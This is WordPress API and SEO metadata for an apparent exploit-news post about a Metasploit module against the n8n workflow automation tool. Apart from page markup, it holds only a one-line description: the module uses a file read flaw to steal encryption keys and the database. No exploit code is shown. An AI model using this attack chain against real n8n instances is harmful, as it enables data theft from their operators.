redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-17T12:46:12+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41167\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41167#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \\\/ Admin Data Extraction_PACKETSTORM:215730\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41167","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730 - zero redgem","og_description":"{“lastseen”:”2026-02-17T18:14:57″,”description”:”This Metasploit module exploits multiple vulnerabilities in n8n workflow automation tool. It leverages a file read vulnerability to steal encryption keys and database, then uses...","og_url":"https:\/\/zero.redgem.net\/?p=41167","og_site_name":"zero redgem","article_published_time":"2026-02-17T12:46:12+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"19 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41167#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41167"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730","datePublished":"2026-02-17T12:46:12+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41167"},"wordCount":3750,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-10.0","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41167#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41167","url":"https:\/\/zero.redgem.net\/?p=41167","name":"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-17T12:46:12+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41167#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41167"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41167#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 n8n Workflow Automation Remote Configuration \/ Admin Data Extraction_PACKETSTORM:215730"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41167","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41167"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41167\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41167"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41167"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41167"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}